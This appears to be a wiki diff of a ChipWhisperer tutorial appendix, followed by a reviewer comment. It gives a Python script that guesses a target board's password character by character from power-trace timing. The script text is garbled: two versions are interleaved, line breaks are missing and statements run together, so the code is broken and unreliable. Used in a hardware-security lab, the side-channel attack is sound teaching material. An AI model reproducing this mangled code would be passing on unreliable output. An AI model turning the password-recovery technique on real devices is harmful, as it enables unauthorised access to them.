
Tutorial B3-1 Timing Analysis with Power for Password Bypass

1,749 bytes removed, 13:57, 23 September 2017
Appendix: Completed Timing Attack Script
= Appendix: Completed Timing Attack Script =
The <code>run()</code> function at the end of the tutorial might look something like the following:
<presyntaxhighlight lang=python>"""This script is an example of a timing attack on a simple password checker. It is the result of Tutorial B3-1 from the ChipWhisperer Wiki.""" import chipwhisperer as cwfrom chipwhisperer.capture.auxiliary.ResetCW1173Read import ResetCW1173 # GUI compatibilitytry: def runscope = self.scope target = aux_list = self.aux_listexcept NameError: pass # Set up scopescope.gain.gain = 45scope.adc.samples = 2000scope.adc.offset = 0scope.adc.basic_mode = "rising_edge"scope.clock.clkgen_freq = 7370000scope.clock.adc_src = "clkgen_x4"scope.trigger.triggers = "tio4" = "serial_rx" = "serial_tx" = "clkgen" # Set up targettarget.key_cmd = ""target.go_cmd = "h0px3\n"target.output_cmd = "" # Set up aux module to reset target before captureresetter = ResetCW1173(xmega=True, delay_ms=1200)aux_list.register(resetter.resetThenDelay, "before_trace") # Test one capturecw.captureN(self.scope,, None, self.aux_list, self.ktp, 1)trace = scope.getLastTrace()print trace # Crack the first letterpassword = ''trylist = 'abcdefghijklmnopqrstuvwxyz0123456789' for i in range(5): for c in trylist: # This is the function that gets called when Get a power trace using our script startsnext attempt nextPass = password + '{}'.format(c) + "\n" target.go_cmd = nextPass cw.captureN(self.scope,, None, self.aux_list, self.ktp, 1)
# First: set up Grab the basics and connect to the CW-Litetrace self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC']) self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial']) self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native']) self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite']) self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite']) self.apinextTrace = scope.connectgetLastTrace()
# Next: set up everything we need to connect to the target # Put all of our commands in a list and execute them at the end lstexample = [ # Gain ['OpenADC', 'Gain Setting', 'Setting', 45], # Trigger ['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'], ['OpenADC', 'Trigger Setup', 'Offset', 0], ['OpenADC', 'Trigger Setup', 'Total Samples', 2000], # Clock ['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0], ['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'], ['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None], # Pins ['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True], ['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'], ['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'], ['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'], # Automatic commands ['Simple Serial', 'Load Key Command', ''], ['Simple Serial', 'Go Command', 'h0px3\n'], ['Simple Serial', 'Output Format', ''], # Auto-reset ['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'], ['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200], ] #Download all hardware setup parameters for cmd in lstexample: self.api.setParameter(cmd) # Get one capture for fun self.api.capture1() data = self.api.getScope().channels[0].getTrace() print data # Crack the first letter password = '' trylist = 'abcdefghijklmnopqrstuvwxyz0123456789' for i in range(5): for c in trylist: # Get a power trace using our next attempt nextPass = password + '{}'.format(c) self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)]) self.api.capture1() # Grab the trace nextTrace = self.api.getScope().channels[0].getTrace() # Check location 153, 225, etc. If it's too low, we've failed if nextTrace[153 + 72*i] < -0.2: continue # If we got here, we've found the right letter password += c print '{} characters: {}'.format(i+1, password) break</presyntaxhighlight>
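Review bot: In the new script, both <code>cw.captureN(self.scope, ...)</code> calls still pass <code>self.scope</code>, <code>self.aux_list</code> and <code>self.ktp</code>, even though the "GUI compatibility" block exists to alias <code>self.scope</code> and <code>self.aux_list</code> to the locals <code>scope</code> and <code>aux_list</code> and swallows <code>NameError</code> with <code>pass</code>. When <code>self</code> is not defined, the <code>except</code> branch leaves those locals unbound and the capture calls fail with the same <code>NameError</code> the block was meant to absorb. Use the locals consistently in the capture calls, give <code>ktp</code> a local alias as well, and let the script fail with a clear message when the names cannot be bound. Separately, in the character loop, if no candidate clears the <code>nextTrace[153 + 72*i] < -0.2</code> check, the inner <code>for</code> finishes without <code>break</code> and the outer loop carries on with an unchanged <code>password</code>; an <code>else</code> clause on the inner loop that reports the failure and stops would make a missed threshold or shifted sample offset visible instead of printing nothing.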